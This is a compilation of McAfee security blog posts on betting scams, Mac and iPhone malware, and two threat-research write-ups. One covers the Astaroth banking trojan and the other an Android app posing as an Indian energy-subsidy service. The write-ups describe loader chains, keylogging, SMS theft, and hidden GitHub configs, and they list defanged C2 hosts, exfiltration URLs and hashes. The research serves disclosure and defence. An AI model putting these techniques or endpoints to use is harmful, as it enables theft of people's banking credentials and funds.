    Scammers piggyback on legitimate betting apps and sites another way. They’ll create phony customer support sites that they promote online, with the addition of scam texts and emails to lure in victims. Under the guise of support, they gain a victim’s login info, hack the account, and clean out the victim’s cash.

    Unlicensed offshore platforms

    These form a gray area when it comes to scams. Some of these offshore platforms, while unlicensed, are legitimate to varying degrees. What makes them dangerous is that they have no regulatory oversight, which means they can do things like charge hidden costs, lock accounts, and refuse payment without users having any way to dispute those actions. Some of these platforms might have suspect security measures as well, which could lead to account hacks. And of course, some of these offshore platforms are simply fake betting sites, as mentioned above.

    Handicapper scams

    Earlier this year, the BBB shared word of a growing scam where self-proclaimed experts with “insider information to place sure-thing bets” reach out to victims via email and social media posts. Per the BBB, “A handicapper’s goal isn’t to win bets for their members, it’s to get people to buy their picks. Once you’ve purchased their picks, the handicapper has already won. It doesn’t matter if the pick wins or loses, the handicapper keeps the payment.”

    Of course, that “insider info” is entirely fake. It’s all just a smokescreen to draw in victims.

    Ready to place your bet online? Keep these things in mind.

    1) Stick with legitimate betting sites and apps. Use only legal, regulated sportsbooks when you place a bet.

    If you’re a sports fan, you probably know the names, like BetMGM, DraftKings, FanDuel, bet365 and Fanatics Sportsbook. In addition, check out the organization’s BBB listing at BBB.org. Here you can get a snapshot of customer ratings, complaints registered against the organization, and the organization’s response to the complaints, along with its BBB rating, if it has one.

    2) Use a secure payment method other than your debit card. Credit cards are a good way to go when buying, or betting, online.

    One reason why is the Fair Credit Billing Act, which offers protection against fraudulent charges on credit cards by giving you the right to dispute charges over $50 for goods and services that were never delivered or otherwise billed incorrectly. Your credit card companies may have its own policies that improve upon the Fair Credit Billing Act as well. Debit cards don’t get the same protection under the Act.

    3) Protect yourself from fake betting sites and bogus offers.

    You can steer clear from all kinds of fake sites and bogus offers with the combination of our Web Protection and Scam Detector, found in our McAfee+ plans. They’ll alert you if a link might take you to a sketchy site, and they’ll block those sites if you accidentally tap or click on a bad link.

    In addition to the latest virus, malware, spyware, and ransomware protection, it also includes strong password protection by generating and automatically storing complex passwords to keep your winnings and payment info safer from hackers and crooks.

     

    Editor’s Note:

    If gambling is a problem for you or someone you know, you can seek assistance from a qualified service or professional. Several states have their own helplines, and nationally you can reach out to resources like http://www.gamblersanonymous.org/ or https://www.ncpgambling.org/help-treatment/.

    The post Kickoffs and Rip-offs—Watch Out for Online Betting Scams This Football Season appeared first on McAfee Blog.

    Astaroth: Banking Trojan Abusing GitHub for Resilience

    By: McAfee Labs

    by Harshil Patel and Prabudh Chakravorty

    *EDITOR’S NOTE: Special thank you to the GitHub team for working with us on this research. All malicious GitHub repositories mentioned in the following research have been reported to GitHub and taken down.

    Digital banking has made our lives easier, but it’s also handed cybercriminals a golden opportunity. Banking trojans are the invisible pickpockets of the digital age, silently stealing credentials while you browse your bank account or check your crypto wallet. Today, we’re breaking down a particularly nasty variant called Astaroth, and it’s doing something clever: abusing GitHub to stay resilient.

    McAfee’s Threat Research team recently uncovered a new Astaroth campaign that’s taken infrastructure abuse to a new level. Instead of relying solely on traditional command-and-control (C2) servers that can be taken down, these attackers are leveraging GitHub repositories to host malware configurations. When law enforcement or security researchers shut down their C2 infrastructure, Astaroth simply pulls fresh configurations from GitHub and keeps running. Think of it like a criminal who keeps backup keys to your house hidden around the neighborhood. Even if you change your locks, they’ve got another way in.

    Key Findings 

    • McAfee recently discovered a new Astaroth campaign abusing GitHub to host malware configurations. 
    • Infection begins with a phishing email containing a link that downloads a zipped Windows shortcut (.lnk) file. When executed, it installs Astaroth malware on the system. 
    • Astaroth detects when users access a banking/cryptocurrency website and steals the credentials using keylogging.  
    • It sends the stolen information to the attacker using the Ngrok reverse proxy. 
    • Astaroth uses GitHub to update its configuration when the C2 servers become inaccessible, by hosting images on GitHub which uses steganography to hide this information in plain sight. 
    • The GitHub repositories were reported to GitHub and are taken down. 

    Key Takeaways  

    • Don’t open attachments and links in emails from unknown sources. 
    • Use 2 factor authentication (2FA) on banking websites where possible. 
    • Keep your antivirus up to date. 

    Geographical Prevalence 

    Astaroth is capable of targeting many South American countries like Brazil, Mexico, Uruguay, Argentina, Paraguay, Chile, Bolivia, Peru, Ecuador, Colombia, Venezuela, and Panama. It can also target Portugal and Italy. 

    But in the recent campaign, it seems to be largely focused on Brazil. 

    Figure 1: Geographical Prevalence 

     

    Conclusion 

    Astaroth is a password-stealing malware family that targets South America. The malware leverages GitHub to host configuration files, treating the platform as resilient backup infrastructure when primary C2 servers become inaccessible. McAfee reported the findings to GitHub and worked with their security research team to remove the malicious repositories, temporarily disrupting operations. 

     

    Technical Analysis 

    Figure 2 : Infection chain 

     

    Phishing Email 

    The attack starts with an e-mail to the victim which contains a link to a site that downloads a zip file. Emails with themes such as DocuSign and resumes are used to lure the victims into downloading a zip file. 

    Figure 3: Phishing Email

    Figure 4: Phishing Email

    Figure 5: Phishing Email

     

    JavaScript Downloader 

    The downloaded zip file contains a LNK file, which has obfuscated javascript command run using mshta.exe. 

     

    This command simply fetches more javascript code from the following URL: 

     

    To impede analysis, all the links are geo-restricted, such that they can only be accessed from the targeted geography. 

    The downloaded javascript then downloads a set of files in ProgramData from a randomly selected server: 

    Figure 6: Downloaded Files

    Here,  

    ”Corsair.Yoga.06342.8476.366.log” is  AutoIT compiled script, “Corsair.Yoga.06342.8476.366.exe” is AutoIT interpreter, 

    “stack.tmp” is an encrypted payload (Astaroth), 

     and “dump.log” is an encrypted malware configuration. 

    AutoIt script is executed by javascript, which builds and loads a shellcode in the memory of AutoIT process. 

     

    Shellcode Analysis 

    Figure 7: AutoIt script building shellcode

    The shellcode has 3 entrypoints and $LOADOFFSET is the one using which it loads a DLL in memory. 

    To run the shellcode the script hooks Kernel32: LocalCompact, and makes it jump to the entrypoint. 

    Figure 8: Hooking LocalCompact API 

     
    Shellcode’s $LOADOFFSET starts by resolving a set of APIs that are used for loading a DLL in memory. The API addresses are stored in a jump table at the very beginning of the shellcode memory. 

    Figure 9: APIs resolved by shellcode 

     

    Here shellcode is made to load a DLL file(Delphi) and this DLL decrypts and injects the final payload into newly created RegSvc.exe process. 

     

    Payload Analysis 

    The payload, Astaroth malware is written in Delphi and uses various anti-analysis techniques and shuts down the system if it detects that it is being analyzed. 

    It checks for the following tools in the system: 

    Figure 10: List of analysis tools 

     

    It also makes sure that system locale is not related to the United States or English. 

    Every second it checks for program windows like browsers, if that window is in foreground and has a banking related site opened then it hooks keyboard events to get keystrokes. 

    Figure 11: Hooking keyboard events 

    Programs are targeted if they have a window class name containing chrome, ieframe, mozilla, xoff, xdesk, xtrava or sunawtframe.

    Many banking-related sites are targeted, some of which are mentioned below:
    caixa.gov.br 

    safra.com.br 

    Itau.com.br 

    bancooriginal.com.br 

    santandernet.com.br 

    btgpactual.com 

     

    We also observed some cryptocurrency-related sites being targeted: 

    etherscan.io 

    binance.com 

    bitcointrade.com.br 

    metamask.io 

    foxbit.com.br 

    localbitcoins.com 

     

    C2 Communication & Infrastructure 

    The stolen banking credentials and other information are sent to C2 server using a custom binary protocol. 

    Figure 12: C2 communication  

     

    Astaroth’s C2 infrastructure and malware configuration are depicted below. 

    Figure 13: C2 infrastructure 

    Malware config is stored in dump.log encrypted, following is the information stored in it: 

    Figure 14: Malware configuration 

     

    Every 2 hours the configuration is updated by fetching an image file from config update URLs and extracting the hidden configuration from the image. 

    hxxps://bit[.]ly/4gf4E7H —> hxxps://raw.githubusercontent[.]com//dridex2024//razeronline//refs/heads/main/razerlimpa[.]png 

    Image file keeps the configuration hidden by storing it in the following format:

    We found more such GitHub repositories having image files with above pattern and reported them to GitHub, which they have taken down. 

    Persistence Mechanism  

    For persistence, Astaroth drops a LNK file in startup folder which runs the AutoIT script to launch the malware when the system starts.  

    McAfee Coverage 

    McAfee has extensive coverage for Astaroth: 

    Trojan:Shortcut/SuspiciousLNK.OSRT 

    Trojan:Shortcut/Astaroth.OJS 

    Trojan:Script/Astaroth.DL 

    Trojan:Script/Astaroth.AI 

    Trojan:Script/AutoITLoader.LC!2 

    Trojan:Shortcut/Astaroth.STUP 

    Indicator Of Compromise(s) 

    IOC  Hash / URL 
    Email  7418ffa31f8a51a04274fc8f610fa4d5aa5758746617020ee57493546ae35b70
    7609973939b46fe13266eacd1f06b533f8991337d6334c15ab78e28fa3b320be
    11f0d7e18f9a2913d2480b6a6955ebc92e40434ad11bed62d1ff81ddd3dda945 
    ZIP URL  https://91.220.167.72.host.secureserver[.]net/peHg4yDUYgzNeAvm5.zip 
    LNK  34207fbffcb38ed51cd469d082c0c518b696bac4eb61e5b191a141b5459669df 
    JS Downloader  28515ea1ed7befb39f428f046ba034d92d44a075cc7a6f252d6faf681bdba39c 
    Download server  clafenval.medicarium[.]help
    sprudiz.medicinatramp[.]click
    frecil.medicinatramp[.]beauty
    stroal.medicoassocidos[.]beauty
    strosonvaz.medicoassocidos[.]help
    gluminal188.trovaodoceara[.]sbs
    scrivinlinfer.medicinatramp[.]icu
    trisinsil.medicesterium[.]help
    brusar.trovaodoceara[.]autos
    gramgunvel.medicoassocidos[.]beauty
    blojannindor0.trovaodoceara[.]motorcycles 
    AutoIT compiled script  a235d2e44ea87e5764c66247e80a1c518c38a7395291ce7037f877a968c7b42b 
    Injector dll  db9d00f30e7df4d0cf10cee8c49ee59a6b2e518107fd6504475e99bbcf6cce34 
    payload  251cde68c30c7d303221207370c314362f4adccdd5db4533a67bedc2dc1e6195 
    Startup LNK  049849998f2d4dd1e629d46446699f15332daa54530a5dad5f35cc8904adea43 
    C2 server  1.tcp.sa.ngrok[.]io:20262
    1.tcp.us-cal-1.ngrok[.]io:24521
    5.tcp.ngrok[.]io:22934
    7.tcp.ngrok[.]io:22426
    9.tcp.ngrok[.]io:23955
    9.tcp.ngrok[.]io:24080 
    Config update URL  https://bit[.]ly/49mKne9
    https://bit[.]ly/4gf4E7H https://raw.githubusercontent[.]com/dridex2024/razeronline/refs/heads/main/razerlimpa.png 
    GitHub Repositories hosting config images  https://github[.]com/dridex2024/razeronline 

    https://github[.]com/Config2023/01atk-83567z 

    https://github[.]com/S20x/m25 

    https://github[.]com/Tami1010/base 

    https://github[.]com/balancinho1/balaco 

    https://github[.]com/fernandolopes201/675878fvfsv2231im2 

    https://github[.]com/polarbearfish/fishbom 

    https://github[.]com/polarbearultra/amendointorrado 

    https://github[.]com/projetonovo52/master 

    https://github[.]com/vaicurintha/gol 

     

    The post Astaroth: Banking Trojan Abusing GitHub for Resilience appeared first on McAfee Blog.

    Can Apple Macs get Viruses?

    By: McAfee

    While Apple goes to great lengths to keep all its devices safe, this doesn’t mean your Mac is immune to all computer viruses. What does Apple provide in terms of antivirus protection? In this article, we will discuss some signs that your Mac may be infected with a virus or malware, the built-in protections that Apple provides, and how you can protect your computer and yourself from threats beyond viruses.

    What is a Mac virus?

    A computer virus is a piece of code that inserts itself into an application or operating system and spreads when that program is run. While viruses exist, most modern threats to macOS come in the form of other malicious software, also known as malware. While technically different from viruses, malware impacts your Mac computers similarly: it compromises your device, data, and privacy.

    Macs are not invulnerable to being hacked

    While Apple’s macOS has robust security features, it’s not impenetrable. Cybercriminals can compromise a Mac through several methods that bypass traditional virus signatures. Common attack vectors include software vulnerabilities, phishing attacks that steal passwords, drive-by downloads from compromised websites, malicious browser extensions that seem harmless, or remote access Trojans disguised as legitimate software.

    Common types of viruses and malware

    Understanding the common types of viruses and malware that target macOS can help you better protect your device and data. Here’s a closer look at the most prevalent forms of malware that Mac users should watch out for.

    • Adware and potentially unwanted programs (PUPs): These programs hijack your browser, alter your search engine, and bombard you with pop-up ads, severely impacting performance and privacy.
    • Trojans: Disguised as legitimate software, such as fake Adobe Flash Player installers or system optimization tools, trojans create a backdoor on your Mac for attackers to steal data, install other malware, or take control of your device.
    • Spyware and keyloggers: This malicious software operates silently in the background, recording your keystrokes, capturing login credentials, and monitoring your activity to steal sensitive personal and financial information.
    • Ransomware: A particularly damaging threat, ransomware encrypts your personal files, photos, and documents, making them inaccessible. Attackers then demand a hefty ransom payment for the decryption key.
    • Cryptominers: This malware hijacks your Mac’s processing power to mine for cryptocurrencies like Bitcoin. It doesn’t steal data but can cause extreme slowdowns, overheating, and increased electricity usage.

    Signs that your Mac may be hacked

    Whether hackers physically sneak it onto your device or by tricking you into installing it via a phony app, a sketchy website, or a phishing attack, viruses and malware can create problems for you in a couple of ways:

    Performance issues

    Is your device operating slower, are web pages and apps harder to load, or does your battery never seem to keep a charge? These are all signs that you could have a virus or malware running in the background, zapping your device’s resources.

    Your computer heats up

    Malware or mining apps running in the background can burn extra computing power and data, causing your computer to operate at a high temperature or overheat.

    Mystery apps or data

    If you find unfamiliar apps you didn’t download, along with messages and emails that you didn’t send, that’s a red flag. A hacker may have hijacked your computer to send messages or to spread malware to your contacts. Similarly, if you see spikes in your data usage, that could be a sign of a hack as well.

    Pop-ups or changes to your screen

    Malware can also be behind spammy pop-ups, unauthorized changes to your home screen, or bookmarks to suspicious websites. In fact, if you see any configuration changes you didn’t personally make, this is another big clue that your computer has been hacked.

    Browser redirects

    Your browser’s homepage or default search engine changes without your permission, and searches are redirected to unfamiliar sites. Check your browser’s settings and extensions for anything you don’t recognize.

    Disabled security features

    Your antivirus software or macOS firewall is disabled without your action. Some viruses or malware are capable of turning off your security software to allow them to perform their criminal activities.

    Check your Mac for viruses and malware

    Fortunately, there are easy-to-use tools and key steps to help you validate for viruses and malware so you can take action before any real damage is done.

    1. Check activity monitor: Navigate to Applications > Utilities > Activity Monitor and look for any unknown processes using a disproportionate amount of CPU or memory. A quick web search can help identify if a suspicious process is malicious.
    2. Review login items: Go to System Settings > General > Login Items. Check the “Open at Login” and “Allow in the Background” sections for any apps you don’t recognize and disable them.
    3. Inspect system profiles: In System Settings > Privacy & Security, scroll down to “Profiles.” If you see any profiles you did not intentionally install, aside from those for work or school, remove them.
    4. Audit browser extensions: Open your web browsers and review installed extensions. Remove any that you did not add or no longer use.
    5. Run a security scan: The most reliable method is to use a dedicated security application. Run a full system scan with a trusted program to detect and remove any malware that manual checks may have missed.
    6. Update everything: Ensure your macOS and all installed applications are up to date. Updates frequently contain critical security patches that protect against known vulnerabilities exploited by hackers.

    Built-in antivirus solution

    Macs contain several built-in features that help protect them from viruses:

    • XProtect and quarantine: XProtect is Apple’s proprietary antivirus software built into all Macs since 2009. It works the same as any other antivirus, scanning suspicious files and apps for malware, then quarantining or limiting their access to the Mac’s operating system and other key functions. XProtect relies on up-to-date information to spot malicious files. However, this information may be outdated, and may not always protect Mac users from the latest threats.
    • Malware removal tool: To further keep Apple users protected, the malware removal tool scans Macs to spot and catch any malware that may have slipped past XProtect. Similar to XProtect, it relies on a set of constantly updated definitions to identify potential malware, removes malware upon receiving updated information, and continues to check for infections on restart and login.
    • Notarization and Gatekeeper: Apps for Apple devices go through a review before they are distributed and sold outside the App Store. When this review turns up no instances of malware, Apple issues a notarization ticket. That ticket is recognized in the macOS Gatekeeper, which verifies the ticket and allows the app to launch. If a previously approved app is later found to be malicious, Apple revokes its notarization and prevents it from running.
    • App Store review: All apps that wish to be sold on the Apple App Store must go through Apple’s App Store review. While not strictly a review for malware, security matters are considered in this process to ensure that all apps posted on the App Store are “reliable, perform as expected, respect user privacy, and are free of objectionable content.”
    • Other features: In addition to the above, Apple includes technologies that prevent malware from doing more harm, such as preventing damage to critical system files.

    Do I need an antivirus for my Mac?

    There are a couple of reasons why Mac users may want to consider additional protection on top of the built-in antivirus safeguards:

    1. Apple’s antivirus may not recognize the latest threats. These tools primarily rely on known virus definitions, which may lag behind the latest cyberthreats including “zero-day” incidents. This leaves Mac owners susceptible to attack if they solely rely on XProtect and other features.
    2. The Mac’s built-in security measures largely focus on viruses and malware. While protecting yourself from viruses and malware is of utmost importance, the reality is that antivirus is not enough. They don’t block other forms of harmful activity, such as phishing attacks, malicious apps downloaded outside of the App Store, suspicious links, prying eyes on public Wi-Fi, data breaches, and identity theft, among others.

    Macs are like any other connected device. They’re also susceptible to the wider world of threats and vulnerabilities on the internet. For this reason, Mac users should think about bolstering their defenses further with online protection software.

    Your guide to removing a Mac virus

    If you suspect your Mac has been infected with a virus or other malware, acting quickly is essential to protect your personal data and stop the threat from spreading. Fortunately, this can be effectively done with a combination of manual steps and trusted security software:

    1. Disconnect from the internet: Immediately disconnect from Wi-Fi or unplug the ethernet cable to prevent the malware from communicating with its server or spreading.
    2. Remove suspicious apps: Open your Applications folder. Drag any unfamiliar or recently installed suspicious applications to the Trash and then empty it.
    3. Delete malicious files: Malware often hides files in your Library folders. Navigate to Finder > Go > Go to Folder and check paths like ~/Library/LaunchAgents and /Library/LaunchDaemons for suspicious files. Be cautious when deleting system files.
    4. Clean up browsers: Remove any unknown extensions from your web browsers and reset your homepage and search engine settings if they were altered.
    5. Run a security scan: The safest and most effective method is to run a full scan with a trusted security solution. This will automatically identify, quarantine, and remove all traces of the infection.
    6. Restore from a clean backup: If the infection is severe and persistent, your best option may be to erase your Mac and cautiously restore from a Time Machine backup created *before* you noticed signs of the virus. If you restore from a backup version that was already infected, you will re-introduce the malware to your clean system.

    Last resort: Reinstalling your macOS

    In the most extreme cases, erasing your hard drive and reinstalling a fresh copy of macOS is a very effective way to eliminate viruses and malware. This process wipes out all data, including the malicious software. This, however, is considered the last resort for deep-rooted infections that are difficult to remove manually.

    Future-proof your Mac from viruses

    As cyber threats grow more sophisticated, taking proactive steps now can protect your device, your data, and your identity in the long run. Here are simple but powerful ways to future-proof your Mac, and help ensure your device stays protected against tomorrow’s threats before they reach you:

    • Keep everything updated: Enable automatic updates for macOS and your applications. This is the single most important step to protect against vulnerabilities.
    • Download from trusted sources only: Stick to the Apple App Store or the official websites of reputable developers. Avoid downloading software from unvetted third-party aggregators or torrent sites.
    • Use strong passwords and multi-factor authentication (MFA): Protect your Apple ID and other accounts with long, complex, and unique passwords and enable MFA to prevent unauthorized access.
    • Be skeptical of unsolicited messages: Do not click on links or download attachments in suspicious emails or texts. These are primary methods for delivering malware and conducting phishing attacks.
    • Install comprehensive security software: Use a trusted security suite like McAfee+ for real-time protection that goes beyond Apple’s built-in tools, offering features like web protection, a firewall, and anti-phishing technology.
    • Back up your data regularly: Maintain regular backups of your important files using Time Machine or a cloud service. This ensures you can recover your data without paying a ransom in a ransomware attack.
    • Stay informed: Be aware of the threats out there and take a proactive stance to fill the gaps in protection. Comprehensive security suites like McAfee+ can take care of it for you. Our exclusive Protection Score checks your online safety, identifies any gaps, and offers personalized guidance to seal those cracks.

    Best digital habits to practice

    Staying safe online isn’t just about having the right software—it’s about making smart choices every day. Adopting strong digital habits can drastically reduce your risk of falling victim to viruses, scams, or data breaches.

    • Browse safely: Be wary of unsolicited links, pop-up windows, and urgent warnings. Use a web protection tool to block known malicious websites before they can load.
    • Scrutinize downloads: Never install software from an untrusted source. Read installation prompts carefully to deselect any bundled optional software or PUPs.
    • Improve email hygiene: Treat emails with attachments or links with caution, even from known senders, as their accounts could be compromised. Verify any unusual requests through a separate communication channel.
    • Review app permissions: When an application asks for permission to access your contacts, location, or other data, consider if it truly needs that access to function. Deny any unnecessary requests.
    • Enable your firewall: Ensure the macOS firewall is turned on in System Settings > Network > Firewall. This provides a basic but important barrier against unsolicited incoming network connections.

    It’s about protecting yourself

    An important part of a McAfee’s Protection Score involves protecting your identity and privacy beyond the antivirus solution. While online threats have evolved, McAfee has elevated its online protection software to thwart hackers, scammers, and cyberthieves who aim to steal your personal info, online banking accounts, financial info, and even your social media accounts to commit identity theft and fraud in your name. As you go about your day online, online protection suites help you do it more privately and safely. Comprehensive security solutions like McAfee+ include:

    • Personal data cleanup reveals which high-risk data brokers and search sites are collecting and selling your personal information. It then requests the removal of your information, confirms completion, and conducts ongoing scans as your data continues to be collected.
    • Unlimited secure VPN automatically connects to public Wi-Fi to protect your online privacy and safeguards personal data while you bank, shop, or browse online.
    • Identity theft and stolen funds coverage reimburses up to $1 million in lost funds or expenses, including losses to 401(k) accounts, while restoring your identity.
    • Ransomware coverage reimburses up to $25,000 for losses and ransom fees.
    • Licensed restoration experts who help repair identity and credit issues, including assistance with the identity fraud of a deceased family member.
    • Credit monitoring promptly alerts you about changes to your credit score, report, and accounts and guides you on actions needed to tackle identity theft.
    • Credit Score and Report help you stay on top of daily changes to your credit score and report, from a single location.
    • Security freeze prevents unauthorized access to existing accounts or new ones being set up in your name with a credit, bank, or utility account freeze.
    • Identity monitoring scans for up to 60 unique pieces of personal information on the dark web with timely alerts up to 10 months sooner than competitive products.

    FAQs about Mac viruses

    Can Macs get viruses from Safari?

    Yes. While Safari has built-in security features, you can still get a Mac virus by visiting a compromised website that initiates a drive-by download or by being tricked into downloading and running a malicious file.

    Do pop-ups mean my Mac is infected?

    Not necessarily. Many websites use aggressive pop-up advertising. However, if you see persistent pop-ups that are difficult to close, or fake virus warnings, it’s a strong sign of an adware infection.

    Is adware a type of malware?

    Yes. While some consider it less harmful than a trojan, adware is a form of malware. It compromises your browsing experience, tracks your activity, slows down your computer, and can serve as a gateway for more dangerous infections.

    How often should you scan for viruses?

    If you have a security suite with real-time protection, your Mac is continuously monitored. It is still good practice to run a full system scan at least once a week for peace of mind.

    Can iPhones spread malware to Macs?

    Direct infection via a cable is extremely unlikely due to the security architecture of both operating systems. The greater risk comes from shared accounts. A malicious link or file opened on one device and synced via iCloud, or a compromised Apple ID, could affect your other devices.

    Final thoughts

    Current trends show a rise in sophisticated adware and PUPs that are often bundled with legitimate-looking software. Cybercriminals are also focusing on malicious browser extensions that steal data and credentials, injecting malicious code into legitimate software updates, or devising clever ways to bypass Apple’s notarization process. Given these developments, Macs can and do get viruses and are subject to threats just like any other computer. While Apple provides a strong security foundation, their operating systems may not offer the full breadth of protection you need, particularly against online identity theft and the latest malware threats. Combining an updated system, smart online habits, and a comprehensive protection solution helps you stay well ahead of emerging threats. Regularly reviewing your Mac’s security posture and following the tips outlined here will also enable you to use your device with confidence and peace of mind.

    The post Can Apple Macs get Viruses? appeared first on McAfee Blog.

    Android Malware Promises Energy Subsidy to Steal Financial Data

    By: McAfee Labs

    Authored by ZePeng Chen

    Recently, we identified an active Android phishing campaign targeting Indian users. The attackers impersonate a government electricity subsidy service to lure victims into installing a malicious app. In addition to stealing financial information, the malicious app also steals text messages, uses the infected device to send smishing messages to user’s contact list, can be remotely controlled using Firebase and phishing website and malware was hosted in GitHub. This attack chain leverages YouTube videos, a fake government-like website, and a GitHub-hosted APK file—forming a well-orchestrated social engineering operation. The campaign involves fake subsidy promises, user data theft, and remote-control functionalities, posing a substantial threat to user privacy and financial security.

    McAfee, as part of the App Defense Alliance committed to protecting users and the app ecosystem, reported the identified malicious apps to Google. As a result, Google blocked the associated FCM account to prevent further abuse. McAfee also reported the GitHub-hosted repository to GitHub Developer Support Team, which took action and already removed it from GitHub. McAfee Mobile Security detects these malicious applications as a high-risk threat. For more information, and to get fully protected, visit McAfee Mobile Security.

    Background

    The Government of India has approved the PM Surya Ghar: Muft Bijli Yojana on 29th February, 2024 to increase the share of solar rooftop capacity and empower residential households to generate their own electricity. The scheme provides for a subsidy of 60% of the solar unit cost for systems up to 2kW capacity and 40 percent of additional system cost for systems between 2 to 3kW capacity. The subsidy has been capped at 3kW capacity. The interested consumer has to register on the National Portal. This has to be done by selecting the state and the electricity distribution company. Scammers use this subsidy activity to create phishing websites and fake applications, stealing the bank account information of users who want to apply for this subsidy.

    Technical Findings

    Distribution Methods

    This phishing operation unfolds in multiple stages:

    1. YouTube Video Lure: The attackers upload promotional videos claiming users can receive “government electricity subsidies” through a mobile app. A shortened URL is included in the video description to encourage users to click.

    Figure 1. YouTube video promoting the phishing URL

     

         2. Phishing Website Imitation: The shortened URL redirects to a phishing website hosted on GitHub. it designed to closely resemble an official Indian government portal.

     

    Figure 2. Phishing and official website

    The phishing site has a fake registration process instruction, once the users believe this introduction, they will not have any doubts about the following processes. The phishing site also has a fake Google Play icon, making users believe it’s a Google Play app, but in reality, the icon points to an APK file on GitHub. When victims click the Google Play icon, it will download the APK from GitHub repository instead of accessing Google Play App Store.

        3. GitHub-Hosted APK and Phishing page

    Both the phishing site source and the APK file are hosted on the same GitHub repository—likely to bypass security detection and appear more legitimate. The repository activity shows that this malicious app has been continuously developed since October 2024, with frequent updates observed in recent weeks.

     

    Figure 3. Malware repository in GitHub

    Installation without network

    The downloaded APK is not the main malicious component. Instead, it contains an embedded APK file at assets/app.apk, which is the actual malware. The initial APK serves only to install the embedded one. During installation, users are deceived into believing they are installing a “security update” and are prompted to disable mobile data or Wi-Fi, likely to reduce the effectiveness of malware detection solutions that use detection technologies in the cloud. But McAfee is still able to detect this threat in offline mode

     

    Figure 4. Install a malicious APK without a network

    According to the installation instructions, a malicious application will be installed. There are 2 applications that are installed on devices.

    • PMBY – The initial APK, it is used to install PMMBY.
    • PMMBY – Malware APK, it is installed under the guise of “Secure Update“

     

    Figure 5. Application names and icons.

    Malware analysis

    PMMBY is an application that actually carries out malicious behavior—let’s delve into the concrete details of how it accomplishes this.

    It requests aggressive permission when it is launched.

    • READ_CONTACTS – Read contacts list
    • CALL_PHONE – Make/manage phone calls
    • READ_SMS, SEND_SMS – View and send SMS messages
    • Notification access – For spamming or masking malicious actions

    Figure 6. Aggressive permissions request

    Fake UI and Registration Process

    Once permissions are granted, the app displays a fake electricity provider selection screen. The message “To Get 300 Unit Free Every Month Please Select Your Electricity Provider From Below And Proceed” is shown in English and Hindi to prompt users to select their provider.

     

    Figure 7. “SELECT YOUR PROVIDER” Activity

     

    After selecting a provider, the app presents a fake registration form asking for the user’s phone number and a ₹1 payment to “generate a registration token.”

     

    Figure 8. Registration Form

     

    In this stage, malware creates a background task to send a https request to https[://]rebrand[.]ly/dclinkto2. The response text is https[://]sqcepo[.]replit[.]app/gate[.]html,https[://]sqcepo[.]replit[.]app/addsm[.]php. The string is split as 2 URLs.

    • UPI PIN URL – https[://]sqcepo[.]replit[.]app/gate[.]html. It will be used in “ENTER UPI PIN” process. When malware uses this URL, “gate.html” will be replace with“gate.hml”, so the loaded URL is https[://]sqcepo[.]replit[.]app/gate[.]htm.
    • SMS Uploaded URL – https[://]sqcepo[.]replit[.]app/addsm[.]php. SMS incoming messages are uploaded to this URL.

    Figure 9. dclinkto2 request

     

    In the stage of ”MAKE PAYMENT of ₹ 1“,victims are asked to use “UPI-Lite” app to complete the payment. In the “UPI-Lite” activity, victims enter the bank UPI PIN code.

     

    Figure 10. The process of “ENTER UPI PIN”

    UPI Credential Theft

    UPI-Lite activity is a fake HTML-based form from https[://]sqcepo[.]replit[.]app/gate[.]htm.

    Once submitted, the phone number, bank details, and UPI PIN are uploaded to https[://]sqcepo[.]replit[.]app/addup.php. After the attacker obtains this information, they can steal money from your bank account.

     

    Figure 11. Post user’s banker information.

    Malware Background Behaviors

    In addition to stealing the financial and banking information from the user, the malware is also able to send distribution itself by sending a phishing message to the victim’s contact list, stealing user’s text messages probably to intercept 2FA codes and can be remotely controlled via Firebase.

    • Send mass phishing SMS messages to Indian users from the victims’ contacts list.

    Figure 12. Send Phishing SMS message.

    • Upload SMS message to Server.

    Malware has requested view SMS permission when it is launched. When it receives the incoming SMS message, it handles the message and posts below data to remote server(https[://]sqcepo[.]replit[.]app/addsm[.]php).

    • senderNum: The phone number of send the incoming message.
    • Message: The incoming SMS message.
    • Slot: Which SIM Slot to receive the message
    • Device rand: A random number was created during the first run to identify the device.

    Figure 13. Post Incoming SMS message

    • Firebase as a Command Channel.

    Attackers use FCM(Firebase Cloud Messaging) to send commands to control devices. According to the _type value, malware executes different commands.

     

    Table1. Commands from FCM message

     

    Figure 14. Commands from FCM message

    Recommendations

    To protect against such sophisticated attacks, users and defenders should take the following precautions:

    • Avoid downloading apps from unofficial websites:
      Especially those offering benefits like subsidies, rewards, or financial aid.
    • Be cautious of apps that require disabling network connections:
      This is often a red flag used to evade real-time antivirus scanning.
    • Carefully review app permissions:
      Apps requesting contact access, SMS read/send or call permissions—without clear reason—should be treated as suspicious.
    • Use security software with SMS protection:
      Enable permission alerts and use reputable mobile security apps to detect abnormal app behavior. McAfee’s Scam Detector as an additional protection for the smishing part.

    Cybercriminals are using relevant themes like energy subsidies to trick users into providing financial information. This campaign demonstrates an integrated and stealthy attack chain. YouTube is used to distribute phishing link, GitHub is a reliable and legitimate website to using it to both distribute malicious APKs and serve phishing websites make it more difficult to identify and take it down, and malware authors can remotely update the phishing text messages to be more effective in tricking users into installing the malware via Firebase Cloud Messaging (FCM). With its self-propagation capabilities, financial data theft, and remote-control functions, it poses a serious risk. We will continue to monitor this threat, track emerging variants, and coordinate with relevant platforms to report and help take down associated infrastructure.

    Indicators of Compromise (IOCs)

    The post Android Malware Promises Energy Subsidy to Steal Financial Data appeared first on McAfee Blog.

    A Guide to Remove Malware From Your iPhone

    By: McAfee

    Malicious software, also called malware, refers to any program or code engineered to harm or exploit computer systems, networks and devices. It affects your phone’s functionality, especially if you jailbreak your device—that is, opening your iOS to additional features, apps, and themes. 

    The risks associated with a malware infection can range from poor device performance to stolen data. Cybercriminals typically use it to extract data—from financial data and healthcare records to emails and passwords—that they can leverage over victims for financial gain. 

    Thanks to their closed ecosystem, built-in security features, and strict policies on third-party apps, Apple devices tend to be generally resilient against malware infections. It’s important to note, however, that they’re not completely without vulnerabilities.

    Read on to learn how you can detect malware on your iPhone and how to remove these infections so you can get back to enjoying your digital activities.

    What is iPhone malware?

    While traditional self-replicating viruses are rare on iPhones, malware is a genuine threat for Apple devices. Malware typically enters through links in deceptive texts or emails or through downloaded, unvetted apps rather than system-wide infection. These are some types of malware that could infect your iPhone:

    • Adware: Once embedded into your phone, adware collects your personal data and learns browsing habits to determine what kinds of ads can be targeted to you. It then bombards your screen with pop-up ads.
    • Ransomware: This type of malware encrypts your files or locks you out of your computer, making the data inaccessible. The attackers then demand a ransom before releasing your encrypted files or systems.
